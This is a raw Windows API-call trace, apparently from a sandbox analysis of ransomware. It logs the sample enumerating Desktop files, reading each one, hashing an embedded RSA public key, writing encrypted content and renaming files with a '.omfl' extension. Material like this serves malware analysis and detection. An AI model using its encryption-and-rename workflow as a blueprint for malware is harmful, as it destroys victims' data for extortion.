Size=0xc) returned 0xdd167e8 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ba8 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b78 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ba8 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.383] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2e48 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.384] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x9187, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x9187, lpOverlapped=0x0) returned 1 [0130.384] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.384] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x918c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.384] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.385] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.385] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.385] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.385] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.385] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.385] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.385] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.385] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.385] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.385] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.385] CloseHandle (hObject=0x5c8) returned 1 [0130.388] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.388] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x7516fe8 [0130.388] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.388] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CmmRZZAyM5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmmrzzaym5.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CmmRZZAyM5.pdf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmmrzzaym5.pdf.omfl")) returned 1 [0130.389] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.389] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.389] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.391] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.391] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1383310, ftCreationTime.dwHighDateTime=0x1d5dd22, ftLastAccessTime.dwLowDateTime=0xade02990, ftLastAccessTime.dwHighDateTime=0x1d5e08c, ftLastWriteTime.dwLowDateTime=0xade02990, ftLastWriteTime.dwHighDateTime=0x1d5e08c, nFileSizeHigh=0x0, nFileSizeLow=0xcc77, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d0EJm7uAME0kmSc8BPIa.png", cAlternateFileName="D0EJM7~1.PNG")) returned 1 [0130.391] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.391] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.391] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.391] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d0EJm7uAME0kmSc8BPIa.png") returned=".png" [0130.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d0EJm7uAME0kmSc8BPIa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d0ejm7uame0kmsc8bpia.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.391] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=52343) returned 1 [0130.391] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.395] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xcc51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.395] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.396] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.397] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xcc77, lpOverlapped=0x0) returned 1 [0130.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.397] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.397] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.399] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.399] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.399] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.399] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.399] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.399] GetLastError () returned 0x0 [0130.399] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.399] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.399] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.399] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.399] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.399] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.399] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.399] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.399] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.399] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xcc80) returned 0xdd2c688 [0130.400] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.400] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2e48 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b48 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2e90 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b60 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b90 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ba8 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.400] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.400] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.400] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.400] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ba8 | out: hHeap=0x4970000) returned 1 [0130.400] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ba8 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b90 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ba8 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.401] GetCurrentThreadId () returned 0x618 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5980 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.401] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.402] GetCurrentThreadId () returned 0x618 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.402] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.402] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b90 [0130.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.403] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 